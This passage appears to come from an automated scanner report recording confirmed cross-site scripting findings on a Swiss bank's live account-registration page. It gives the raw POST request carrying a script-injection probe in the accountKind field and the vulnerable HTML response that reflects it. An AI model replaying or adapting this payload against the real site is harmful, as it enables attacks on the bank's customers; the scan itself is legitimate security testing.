&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot;  onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;1&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000168)&lt;/script&gt;&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BaccountKind%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000186)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 299
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=2&amp;aData%5BaccountKind%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000186)%3c%2fscript%3e&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
